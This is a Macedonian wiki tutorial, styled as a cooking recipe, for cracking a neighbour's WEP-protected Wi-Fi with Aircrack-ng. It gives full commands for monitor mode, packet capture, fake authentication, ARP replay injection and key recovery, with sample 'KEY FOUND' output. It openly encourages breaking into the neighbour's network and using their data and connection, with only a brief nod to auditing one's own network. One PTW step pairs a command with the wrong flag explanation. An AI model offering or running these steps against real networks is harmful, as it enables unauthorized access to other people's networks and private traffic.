Упатство:Aircrack-ng

Од Сподели wiki
Преработка од 18:38, 29 јануари 2011; направена од Admin (разговор | придонеси) (2 ревизии: initial)
(разл) ← Претходна преработка | Последна преработка (разл) | Следна преработка → (разл)
Прејди на прегледникот Прејди на пребарувањето

Рецепт за гурмани

Потребни состојки:

  • Aircrack-ng - посетете го официјалниот сајт на http://www.aircrack-ng.org
  • Било која Линукс дистрибуција (затоа што Aircrack-ng под Windows „мириса на запечено“), доколку планирате да го инсталирате самите или,
  • Линукс дистрибуција на која има веќе инсталирано Aircrack-ng
  • Wireless картичка (по можност да поддржува инјекција на пакети)
  • Соодветен драјвер за картичката (можете да проверите во листата на поддржани драјвери на официјалниот сајт на Aircrack-ng)
  • Wireless мрежата на комшијата
  • Дебели живци

Опис:

Рецепт за јадење за гурмани чија интернет конекција е слаба заради преминување на лимитот на сообраќајот, или пак имаат желба да „ѕирнат“ на мрежата на комшијата или сакаат само да го почувствуваат задоволството на „паѓањето“ на заштитата на бежичната мрежа. Главна состојка на денешното јадење е Aircrack-ng - програма (повеќе како збир на алатки) за кракирање на 802.11 WEP и WPA-PSK што ги идентифукува клучевите по доволен број на собрани информации (рамки дефинирани со 802.11 протоколот). Ова е една од најбрзите алатки за кракирање на WEP. Користи оптимизирани имплементации на FMS (Fluhrer, Mantin and Shamir), KoreK и PTW нападот на клучевите на WEP. Може да се користи и за кракирање на WPA/WPA-2, но понекогаш ова знае да биде екстремно долго (неколку часа/денови/недели). За да биде појасно, еве едно кратко објаснување на WEP заштитата и нападите кои можат да се користат за нејзино кракирање. WEP се заснова на енкриптирање на пораките испратени во рамките со помош на клуч кој обично се состои од лозинка и некоја променлива иницијална вредност (која и не е баш тешко да се погоди) наречена иницијализирачки вектор. Клучот и иницијализирачкиот вектор се предаваат на псеудо-рандом генератор (RC4 алгоритам) кој всушност го генерира самиот WEP клуч за соодветната мрежа. Секоја порака која се испраќа се екнриптира со помош на овој клуч пред да биде испратена, а самото енкриптирање на пораката е извршување на „исклучително ИЛИ“ (XOR) помеѓу клучот и самата порака. Овој алгоритам има повеќе недостатоци како што се слабоста на иницијализирачките вектори (IV) и повеќе слабости на псеудо-рандом генератор алгоритмот (RC4). Статистички гледано, после енкрипцијата на пораката, првите бајти на некои од рамките ќе имаат специфична структура со чија помош може да се откријат податоци за иницијализирачките вектори како и за самиот клуч. Веројаноста да се испратат вакви рамки не е многу голема, но е доволно голема за да може да се открие клучот во разумно време (помала веројтност значи дека бројот на вакви рамки ќе биде мал во споредба со вкупниот број на рамки, но нема да биде 0. Во доволно долг временски период ќе се генерираат голем број на рамки, меѓу кои ќе има доволен број на вакви специјални рамки). На почетокот имплементација на FMS нападот (напад на RC4, кој освен за WEP бил користен и за други алгоритми за безбедност) биле потребни околу 2 000 000 IV (иницијализирачки вектори), додека подоцна со оптимизација на овој алгоритам благодарение на хакерот по имe KoreK овој број е намален на 200 000 до 500 000 IV. Aircrack користи оптимизирани алгоритми на кои им се потребни помалку 100 000 рамки со специфичен формат. Треба да се земе во обзир дека овој број (100 000) не е вкупниот број на рамки кои треба стигнат до вашиот компјутер, туку е број на рамки со специфичен формат од кои може да се добијат информации за клучот (вистинскиот број е многу поголем). FSM нападот е пасивен напад. Вашиот компјутер само го слуша сообраќајот низ бежичната мрежа и собира информации. На овој начин кај просечно активна мрежа времето на собирање доволен број податоци е разумно, но не многу кратко (потребни се неколку часа, па понекогаш и неколку дена). Ова може да се забрза со инјектирање на пакети во мрежата (до access-point) кои ќе го засилат сообраќајот во мрежата, а исто така ќе имаат и посакуван формат.

Предјадење:

  • Инсталација на Aircrack-ng - Можете да го инсталирате од претходно компајлирани бинарни датотеки, но за да ја имате последната верзија (ова е битно заради поддршката за бежичните картици) најдобро е да го направите следното:
  1. Потврдете дека имате инсталирано SQLite (последна верзија или верзија поголема од 3.3.7) и OpenSSL (libssl-dev на системите базирани на Debian)
  1. Извршете ги слените команди:
        wget http://download.aircrack-ng.org/aircrack-ng-1.0-rc1.tar.gz
        tar -zxvf aircrack-ng-1.0-rc1.tar.gz
        cd aircrack-ng-1.0-rc1
        make
        make install

Првата е за да ја спуштите најновата верзија на Aircrack-ng (изворен код), потоа го отпакуваме кодот со tar, па самото компајлирање и инсталација на пакетот.

  1. Инсталација од SVN складиште:
        svn co http://trac.aircrack-ng.org/svn/trunk aircrack-ng
        cd aircrack-ng

па вообичаеното:

        make
        make install
  • Не заборавајте да проверите дали вашата картичка е поддржана (погледнете го чипсетот на картичката и побарајте го соодветниот модул во листата на официјалниот сајт на Aircrack-ng)

Главно јадење - кракирање на WEP клуч:

Да претпоставиме дека:

  • MAC адресата на вашиот компјутер е: 00:0F:B5:88:AC:82
  • BSSID (MAC адресата на аксес поинтот - понатаму во текстот AP) е: 00:14:6C:7E:40:80
  • ESSID (името на бежичната мрежа) е: teddy
  • Access point каналот е: 9
  • Интерфејсот на бежичната мрежа е: ath0

Ова се основните чекори кои мора да ги следите при подготовка на главното јадење:

  1. Стартувајте го бежичниот интерфејс во режим на набљудување на AP каналот. Целта на овој чекор е да ја поставите вашата бежична картичка во режим на набљудување со цел да соберете доволен број на IV (иницијализирачки вектори). Теоретски ако сте стрпливи, ова може да се направи само со слушање на мрежата и зачувување на векторите. Но, можеме да користиме повеќе егзотични зачини за да го направиме ручекот повкусен. Сообраќајот низ мрежата ќе се зголеми, а со тоа и бројот на примени вектори во единица време, со помош на техника наречена инјекција на пакети.

Процедура (оваа процедура може да е различна за различни картички - ние претпоставуваме дека катичката е Atheros):

  • Стопирајте го ath0 интерфесот со
           airmon-ng stop ath0 
  • Проверете со iwconfig дека ниеден друг athX интерфејс не е подигнат
  • Стартувајте ја бежичната картичка на канал 9
           airmon-ng start wifi0 9

Ова ќе потврди дека ath0 интерфејсот работи во режим на набљудување:

           Interface       Chipset         Driver

            wifi0           Atheros         madwifi-ng
            ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
  1. Стартувајте го airodump-ng за да ги „фатите“ иницијализирачките вектори

Отворете нов терминал и внесете:

            airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0

каде:

  • -c 9 e каналот на бежичната картичка
  • -bssid 00:14:6C:7E:40:80 е MAC адресата на access-point-от (видете погоре во зачините)
  • -w output е префиксот за генерираната датотека во која ќе се зачуваат иницијализирачките вектори
  • ath0 е името на мрежниот интерфејс
  1. Направете лажна автентикација на AP со aireplay-ng

За да може AP да ги прими вашите пакети, мора вашата MAC адреса да е асоцирана со AP (access point-от). Ако ова не е направено АР ќе ги игнорира вашите пакети и нови инициајлизирачки вектори нема да се креираат, што значи дека нема да имате корист од инјекцијата на пакети. Асоцојацијата со АР се прави на следниот начин:

        aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0

каде:

  • -1 значи лажна автентикација
  • 0 време на реасоцијација во секунди
  • -е teddy е името на бежичната мрежа
  • -a 00:14:6C:7E:40:80 е MAC адресата на АР
  • -h 00:0F:B5:88:AC:82 е нашата MAC адреса
  • ath0 е името на мрежниот интерфејс

Или пак друга варијанта е:

     aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0

каде:

  • 6000 - реавтентицирање на секои 6000 секунди (ова ќе предизвика да бидат праќани keep-alive пакети)
  • -o 1 испраќај само еден сет на пакети истовремено. Стандардното одесување е испраќање на повеќе, што може да ги збуни некои АР-ти.
  • -q 10 испараќај keep alive пакети на секои 10 секунди
  1. Стратувајте го airplay-ng во ARP request reply режим

Целта на овој чекор е стартување на airplay-ng во режим на слушање за ARP requests и нивно повторно испраќање во мрежата. Причината за испраќање на ARP пакети е тоа што AP ќе ги препрати овие пакети повторно низ мрежата и ќе генерира нови иницијализирачки вектори - што всушност е и нашата цел. Напишете ја следната команда:

  aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0

Вака airplay-ng ќе слуша за ARP повици и штом ќе најде, веднаш ќе почне да инјектира. Генерирање на ARP пакети на домашната мрежа може да направите со пингање на непостоечка IP адреса на домашниот LAN. Ако сe функционира како што треба, тогаш бројот на примени пакети ќе почне рапидно да се зголемува.

  1. Стартувајте го aircrack-ng за да го кракнете WEP клучот

Целта на овој чекор е наоѓање на WEP клучот со помош на собраните IV од претходните чекори. Ќе разгледаме 2 методи. За учење или експериментирање, пожелно е да ги пробате двата методи врз 64 битен WEP клуч што ќе го забрза процесот на кракување. PTW методот скоро секогаш упешно го открива клучот, за разлика од FMS/Korek методот, но работи само со ARP request/reply пакети. Погоре опишавме како може да се собираат ARP пакети, па овој метод би требало да функционира. Исто така потребно е да „фатите“ целосен пакет со aerodump-ng, односно не ја користете „--ivs“ опцијата. PTW метод:

     aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0

каде:

  • -z го стартува PTW методот
  • -b 00:14:6C:7E:40:80 го избира аксес поинтот за кој се интересираме. Ова е опционално заради тоа што претходно при собирањето на податоците, ги филтриравме пакетите само од AP кој не интересираше.
  • output*.cap ги зема во обзир сите датотеки со податоци (во кои ги чуваме собраните ИВ и пакети), кои почнуваат со output и завршуваат на .cap.

FMS/Korek метод:

    aircrack-ng -b 00:14:6C:7E:40:80 output*.cap

каде:

  • -b 00:14:6C:7E:40:80 го избира аксес поинтот за кој се интересираме. Ова е опционално заради тоа што претходно при собирањето на податоците, ги филтриравме пакетите само од AP кој не интересираше.
  • output*.cap ги зема во обзир сите датотеки со податоци (во кои ги чуваме собраните ИВ и пакети), кои почнуваат со output и завршуваат на .cap.

Самото разбивање на клучот ќе одземе време. За кракирање на 64 битен клуч потребни се околу 250 000 иницијализирачки вектори и околу 1 500 000 за 128 битен клуч ако го коритите FMS/Korek методот. Со користење на PTW нападот овој број е околу 20 000 за 64 битен клуч и 40 000 до 85 000 за 128 битен клуч. Ако се помине како што треба, на вашиот терминал ќе добиете вакво нешто:

   Aircrack-ng 0.9


                             [00:03:06] Tested 674449 keys (got 96610 IVs)

KB    depth   byte(vote)
 0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) 
 1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) 
 2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) 
 3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) 

                      KEY FOUND! [ 12:34:56:78:90 ] 
     Probability: 100%

каде клучот е 12:34:56:78:90 (се разбира Вие ќе добиете друг клуч за мрежата која ја напаѓате).

Десерт

Ја пробивте мрежата на вашиот сосед па уживајте во слаткиот вкус на десертот. Но не бидете злобни... Освен „слаткиот вкус“ на податоците и интернет конекцијата на вашиот сосед, Aircrack-ng може да ви послужи и да научите како функционира 802.11 протоколот за бежични мрежи, кои заштитни мерки може да ги преземете за да ја заштитите вашата мрежа или мрежата во компанијата во која работите. Може да проверите дали бежичната мрежа е доволно добро заштитена или може да се „свари“ за помалку од една минута. Aircrack-ng може да ви помогне да проверите колку добро сте ја заштитиле вашата бежична мрежа и што можете да подобрите. Исто така може да Ви помогне да си поиграте со бежичните мрежи, да си обезбедите интернет пристап или едноставно да се забавувате. Happy Cracking и не бидете злобни!